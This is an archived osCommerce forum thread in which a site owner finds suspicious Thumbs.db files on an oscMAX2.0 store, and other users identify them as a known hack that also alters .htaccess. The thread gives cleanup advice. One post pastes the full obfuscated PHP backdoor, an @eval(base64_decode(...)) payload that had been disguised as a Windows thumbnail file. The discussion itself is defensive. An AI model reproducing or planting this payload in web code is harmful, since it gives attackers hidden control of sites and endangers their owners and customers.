Plux Posted May 4, 2011 Share Posted May 4, 2011 Are there any files that come with osCommerce called Thumbs.db in a clean installation? Link to comment Share on other sites More sharing options...
Guest Posted May 4, 2011 Share Posted May 4, 2011 Ruud, No, there are not. Chris Link to comment Share on other sites More sharing options...
Plux Posted May 4, 2011 Author Share Posted May 4, 2011 Ruud, No, there are not. Chris Where do these come from then (btw. it was oscMAX2.0). they contain code like I read that they where special oscommerce database files or something like that. ÐÏࡱ and <?php @eval(base64_decode("aWYgKCRldmFsWmpoR1lUZm9GSWV0R28gIT0gMzQ1MTcpIHtmdW5jdGlvbiBldmFsSkhJT2tnekluU01KSCgkcyl7Zm9yICgkYSA9IDA7ICRhIDw9IHN0cmxlbigkcyktMTsgJGErKyApeyRlIC49ICRze3N0cmxlbigkcyktJGEtMX07fXJldHVybigkZSk7fWV2YWwoZXZhbEpISU9rZ3pJblNNSkgoJzspKSI9c1RLd2d5WnVsR2R5OUdjbEozWHk5bWN5VkdRIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsSkhJT2tnekluU01KSCgnOykpIj1BU2Y3a0NhWWxFZTROR1pqRjBheUZGYmhaWFprZ1NaazkyWWxSMlgwWVRaekZtWWc0bWMxUlhaeXRISXBnR1dKaEhlalIyWUJ0bWNSeFdZMlZHSm9ZRVdKRkdWWmRXZVF0RWJoWlhaZzQyYnBSM1l1Vm5aIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsSkhJT2tnekluU01KSCgnOykpIj09d09wSVNQTkpUV2lnaVJZbFVZVWwxWjVCMVNzRm1kbEJTUGdZVlE1OWtabVpVV3RkSFVpeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbEpISU9rZ3pJblNNSkgoJzspKSI3a2lJOTBFU2tobVV6TW1Jb1lFV0pGR1ZaZFdlUXRFYmhaWFo5czJRUjFVY3FGRlVobGxZSHhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxKSElPa2d6SW5TTUpIKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZRVdKRkdWWmRXZVF0RWJoWlhaOU1rWms1VWJCRkZWbVpGVm1aM1E2eFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbEpISU9rZ3pJblNNSkgoJzspKSI9c1RLaTBETlhGbUlvWUVXSkZHVlpkV2VRdEViaFpYWjk4RWVuTlZiT3AxVVM5R1NMSmxid3hXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxKSElPa2d6SW5TTUpIKCc7KSkiPT13T3BJU1A5RVZTMlIyVkpKQ0tHaFZTaFJWV25sSFVMeFdZMlZXUDZkMFlrMVVaejFXYURsbFFpMUdhcnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxKSElPa2d6SW5TTUpIKCc7KSkiPT13T2RsaUlWVlRWU2hrUndnMVVXQlRWV2xqUlZWbFVHTmxJb1lFV0pGR1ZaZFdlUXRFYmhaWFpiSlZSV0pWUlQ5Rko5VTFUcnQwYXJKV2F6Rm1jSXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxKSElPa2d6SW5TTUpIKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1lFV0pGR1ZaZFdlUXRFYmhaWFpnd1NLaVFqVkhwVmRHZDFWaWdpUllsVVlVbDFaNUIxU3NGbWRsQkNMcElTUEpobFd5dzJSaHBtU1lsbFpHZFZZaWdpUllsVVlVbDFaNUIxU3NGbWRsQkNMcElDTTUwV1VQNWtWVUpDS0doVlNoUlZXbmxIVUx4V1kyVkdJc2tpSTlFa2JqRkRleVVsSW9ZRVdKRkdWWmRXZVF0RWJoWlhaZ3dTS2l3R2V5b2xkNUlqVWlnaVJZbFVZVWwxWjVCMVNzRm1kbGhTZWhKbmNoQlNQZzBVYTBaV1RLUkVlcGhIY3E1MlNTeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbEpISU9rZ3pJblNNSkgoJzspKSI9PXdPV0ZVZVBabVpHbFZiM0JsWXNGbWRsUlNQdUFuYUNwVVY1UkdXc05HYmhaWFprQVNLZ3N5S3BSQ0k3Z0RJOXdESXBSQ0k3QURJOUFTYWtnQ0l5OW1aIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsSkhJT2tnekluU01KSCgnOykpIj1zVEtwSVNQOUVsWjNzV2VqdDJaNU5HTTFjbFd3VWpNaXBXT0dSR2JrSkRXc2gzVmgxbVFGbFVkS2hGWndZVmJqZGpRVHRrZVNOMFNObHphYWRuU3NWR05vVjBWQ1pGYmtkblZISkdhYWhsV25Sak1pQm5VemtWZFc1bVdpZ2lSWWxVWVVsMVo1QjFTc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsSkhJT2tnekluU01KSCgnOykpIj09d09XRlVlUFptWkdsVmIzQmxZc0ZtZGxSaUxpNGlJOTRDSXdwbVFLVlZla2hGYmp4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsSkhJT2tnekluU01KSCgnOykpIj0wWGY3TUdXRnBtYlhwV1pqUm1XT2xFYmhaWFprQXlib05XWjcwVk1iTkdXRnBtYlhwV1pqUm1XT2xFYmhaWFprQVNQZ01HV0ZwbWJYcFdaalJtV09sRWJoWlhaa0F5T3BNR1dGcG1iWHBXWmpSbVdPbEViaFpYWmt3aWVITkdaTlYyY3RsMlFaSmtZdGgyYXNGbWRsUkNLbFIyYnNCSGVsQlNQZ01HV0ZwbWJYcFdaalJtV09sRWJoWlhaa3NYS3BvM1JqUldUbE5YYnBOVVdDSldib3RHYmhaWFprd3lZWVZrYXVkbGFsTkdaYTVVU3NGbWRsUkNLeVIzY3lSM2NvQWlacHRUS3AwVktpVWxUeFFWUzVZVVZWSmxSVEpDS0doVlNoUlZXbmxIVUx4V1kyVjJXU1ZrVlNWMFVmUkNLbFIyYmo1V1pzSlhkdWtpSTVjV2JLSkNLR2hWU2hSVldubEhVTHhXWTJWbUxwVTFUcnQwYXJKV2F6Rm1jSXhXWTJWR0pvVUdadk5tYmx4bWMxNVNLaWtUU3Rwa0lvWUVXSkZHVlpkV2VRdEViaFpYWnUwVktpMFRTR0pWUkdCRFdHSlZNVTVrVnJWbElvWUVXSkZHVlpkV2VRdEViaFpYWmJKVlJXSlZSVDlGSnVraUk5QURWaEpDS0doVlNoUlZXbmxIVUx4V1kyVm1McElTUDRRMFlpZ2lSWWxVWVVsMVo1QjFTc0ZtZGw1U0tpOG1RdXhrSW9ZRVdKRkdWWmRXZVF0RWJoWlhadThFZW5OVmJPcDFVUzlHU0xKbGJ3eFdZMlZHSnVraUk5MHpkTUpDS0doVlNoUlZXbmxIVUx4V1kyVm1Md3BtUUtWVmVraEZianhXWTJWR0p1a2lJOWdUZU1KQ0tHaFZTaFJWV25sSFVMeFdZMlZtTHBJU1A5YzJUaWdpUllsVVlVbDFaNUIxU3NGbWRsNXlRbVJtVHRGVVVVWm1WVVptZERwSGJoWlhaa2dDVFBaR2NTcEhlSWhWUVZaSGNseFdZMlZHSTlBeVlZVmthdWRsYWxOR1phNVVTc0ZtZGxSQ0k3a0NNd2dETXhzU0tvVVdicFJITHBraUk5MEVTa2htVXpNbUlvWUVXSkZHVlpkV2VRdEViaFpYWm9VRFp0eHlhREZWVHhwV1VRRldXaWRFYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hyTlVVTkZuYVJCVllaSjJSc0ZtZGxSeVdGbDBTUDkwUWZSQ0swVjJjemxHS2dJM2Jna1NLVjkwYUx0MmFpbDJjaEpIU3NGbWRsUkNJc0lTYXZJQ0l1QVNLTmxHZG0xa1NFaFhhNEJuYXV0a1VzRm1kbFJDSXNJQ2ZpZ1NaazlHYncxV2FnNENJaThpSW9nMlkwRldiZmRXWnlCSEtvWVdhIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7JGV2YWxaamhHWVRmb0ZJZXRHbyA9MzQ1MTc7fQ==")); ?> Link to comment Share on other sites More sharing options...
clumberman Posted May 4, 2011 Share Posted May 4, 2011 Are there any files that come with osCommerce called Thumbs.db in a clean installation? They are generated by Windows, but related to ThumbsPlus thumbnail program. Check www.cerious.com for discussions relating to this file. Link to comment Share on other sites More sharing options...
Plux Posted May 4, 2011 Author Share Posted May 4, 2011 They are generated by Windows, but related to ThumbsPlus thumbnail program. Check www.cerious.com for discussions relating to this file. So none of them should be in a osCMAX2.0 website I presume? I tried deleting one but then I got a fatal error visiting the admin panel. However beside saying error nothing worked out of the ordinary. And why is the file so heavily encrypted? Link to comment Share on other sites More sharing options...
germ Posted May 4, 2011 Share Posted May 4, 2011 I'd bet a pickled buffalo tongue that if you look closer the last file you posted is really named Thumbs.db.php, a known hack file. And hey, what a coincidence, what you posted sure looks like hack code to me... :blush: If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Guest Posted May 4, 2011 Share Posted May 4, 2011 I'd bet a pickled buffalo tongue... hate to lose that in a bet...... <_< Chris Link to comment Share on other sites More sharing options...
NodsDorf Posted May 4, 2011 Share Posted May 4, 2011 http://www.oscommerce.com/forums/topic/374682-weird-files/ You need to either manually remove the malicious code on your site or go to a backup prior to April 23rd (most likely the time of attack). Files that were likely infected Numerous .php files Numerous .htm or html files Had you done this when you first posted the topic, your host would probably had a backup if you didn't they could help you with. You then need to update your FTP program and change all passwords used with it. Additionally read the how to secure your site thread here: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/ I'm not sure how this works in oscMax but its a good starting point none-the-less Link to comment Share on other sites More sharing options...
NodsDorf Posted May 4, 2011 Share Posted May 4, 2011 Also I have seen this attack include database entries.<br> Link to comment Share on other sites More sharing options...
jow ga Posted May 9, 2011 Share Posted May 9, 2011 I have this same attack on one of my sites. the also update the .htaccess file to recognize the thumbs.db. so deleting the thumbs.db is not enough, you have to scroll down to the very bottom of the .htaccess file and delete the added line. tom Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.